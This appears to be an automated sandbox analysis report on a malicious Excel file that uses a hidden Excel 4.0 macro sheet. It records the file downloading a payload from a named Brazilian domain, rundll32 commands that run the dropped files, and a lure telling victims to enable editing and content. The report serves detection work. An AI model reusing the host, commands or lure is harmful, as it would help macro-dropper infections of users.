Loading ...

Play interactive tourEdit tour

Analysis Report diagram-419065597.xls

Overview

General Information

Sample Name:diagram-419065597.xls
Analysis ID:412973
MD5:ec968745c407ee67d80d18c25abaa8d2
SHA1:922818d6a781b3780541837975c54baa4e7a3349
SHA256:431c2a2e6969ba3aa239af68c3150d86837b3e58bc80b2690b91cf39d459ac55
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 1124 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6236 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6276 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1124, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 6236

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: diagram-419065597.xlsReversingLabs: Detection: 14%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 108.167.180.130:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.91.198.131:443 -> 192.168.2.3:49711 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: stateoftheartacademy.com.br
Source: global trafficTCP traffic: 192.168.2.3:49708 -> 108.167.180.130:443
Source: global trafficTCP traffic: 192.168.2.3:49708 -> 108.167.180.130:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: stateoftheartacademy.com.br
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.aadrm.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.cortana.ai
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.office.net
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.onedrive.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://augloop.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://augloop.office.com/v2
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cdn.entity.
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://clients.config.office.net/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://config.edge.skype.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cortana.ai
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cortana.ai/api
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://cr.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dev.cortana.ai
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://devnull.onenote.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://directory.services.
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://graph.windows.net
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://graph.windows.net/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://lifecycle.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://login.windows.local
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://management.azure.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://management.azure.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://messaging.office.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://ncus.contentsync.
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://officeapps.live.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://onedrive.live.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://outlook.office.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://outlook.office365.com/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://powerlift.acompli.net
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://settings.outlook.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://staging.cortana.ai
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://tasks.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://webshell.suite.office.com
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://wus2.contentsync.
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DF844609-1DF5-41CA-99D6-1693334E4107.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownHTTPS traffic detected: 108.167.180.130:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.91.198.131:443 -> 192.168.2.3:49711 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11" from the yellow bar above I 12 13 Once You have Enable Editing, please click
Source: Screenshot number: 4Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,,_ WHY I CANNOT OPEN THIS DOCUMENT ? 19
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11" from the yellow bar above I 12 13 Once You have Enable Editing, please click
Source: Screenshot number: 8Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,,_ WHY I CANNOT OPEN THIS DOCUMENT ? 19
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above I Q WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: diagram-419065597.xlsInitial sample: CALL
Source: diagram-419065597.xlsInitial sample: CALL
Source: diagram-419065597.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: diagram-419065597.xlsInitial sample: Sheet size: 14900
Source: diagram-419065597.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/6@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{FA12EB3A-9917-4D93-8AF6-7142FB82544A} - OProcSessId.datJump to behavior
Source: diagram-419065597.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: diagram-419065597.xlsReversingLabs: Detection: 14%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
